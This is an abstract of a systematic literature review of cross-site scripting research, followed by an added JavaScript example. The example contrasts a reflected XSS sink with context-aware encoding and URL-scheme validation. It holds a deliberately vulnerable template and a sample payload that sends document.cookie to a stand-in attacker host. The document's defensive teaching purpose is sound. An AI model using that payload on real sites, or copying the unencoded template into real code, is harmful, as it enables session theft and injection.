Current state of research on cross-site scripting (XSS) - A systematic literature review

Context: Cross-site scripting (XSS) is a security vulnerability in web applications. It occurs when user-controlled input is placed into a page without adequate validation, sanitization, or output encoding, so that attacker-supplied script runs in the victim's browser. It has caused many problems for both users and the applications that serve them. Objective: To conduct a systematic literature review of the studies on XSS vulnerabilities and attacks. Method: We followed the guidelines for systematic literature reviews documented by Barbara Kitchenham and reviewed a total of 115 studies on cross-site scripting from various journals and conference proceedings. Results: Research on XSS is still very active, with publications spread across many conference proceedings and journals. Attack prevention and vulnerability detection are the areas most studies focus on. Dynamic analysis techniques form the majority of the proposed solutions. The type of XSS addressed most often is reflected XSS. Conclusion: XSS remains a major problem for web applications despite the many solutions proposed so far; no single solution effectively mitigates XSS attacks. More research is needed on removing vulnerabilities from application source code before deployment.
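The abstract describes XSS as untrusted input reaching a page without proper sanitization or encoding, with reflected XSS as the most-studied variant. The following is an added example, not code from the paper or from any of the studies it reviews: a reflected XSS sink in a server-side template beside its hardened form, plus a URL-attribute sink where entity encoding alone is not sufficient. The base origin `https://example.invalid/`, the attacker host, and the sample payload are constructed for illustration.

```javascript
// Added example, not taken from the paper or from any study it reviews.
// Reflected XSS sink beside its hardened form, plus a URL-attribute sink,
// written as plain functions so it runs offline under Node.js.

// Vulnerable: an untrusted query parameter is interpolated straight into HTML,
// so a value such as <script>...</script> is parsed as markup, not text.
function renderGreetingVulnerable(name) {
  return `<h1>Hello, ${name}!</h1>`;
}

// Encoder for HTML text and quoted-attribute contexts: rewrites the five
// characters that can close a text node or a quoted attribute value.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened: same template, but the untrusted value is encoded for the
// context it lands in (HTML body text).
function renderGreetingSafe(name) {
  return `<h1>Hello, ${escapeHtml(name)}!</h1>`;
}

// URL attribute context: entity encoding does not neutralise a javascript:
// URL, so the value is parsed as a URL and only http(s) schemes pass through.
// The base origin is an assumption used to resolve relative links.
const ASSUMED_BASE_ORIGIN = "https://example.invalid/";

function safeHref(url) {
  try {
    const parsed = new URL(String(url), ASSUMED_BASE_ORIGIN);
    if (parsed.protocol === "http:" || parsed.protocol === "https:") {
      return parsed.href;
    }
  } catch (_) {
    // unparseable input falls through to the inert default
  }
  return "#";
}

function renderLinkSafe(url, label) {
  return `<a href="${escapeHtml(safeHref(url))}">${escapeHtml(label)}</a>`;
}

// Constructed sample payload of the kind a reflected XSS attack carries in a
// URL parameter; it sends the document cookie to an attacker-chosen host.
const SAMPLE_PAYLOAD =
  '<script>document.location="https://attacker.invalid/?c="+document.cookie</script>';

console.log(renderGreetingVulnerable(SAMPLE_PAYLOAD)); // script element survives intact
console.log(renderGreetingSafe(SAMPLE_PAYLOAD));       // rendered as inert text
console.log(renderLinkSafe("javascript:alert(1)", "Profile")); // href collapses to "#"
```

The encoder alone would not have protected `renderLinkSafe`: `javascript:alert(1)` contains none of the five special characters, so it passes `escapeHtml` unchanged, which is why the href value is validated as a URL before it is encoded for the attribute. The same context-dependence is what makes generic "sanitize on input" defences incomplete.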
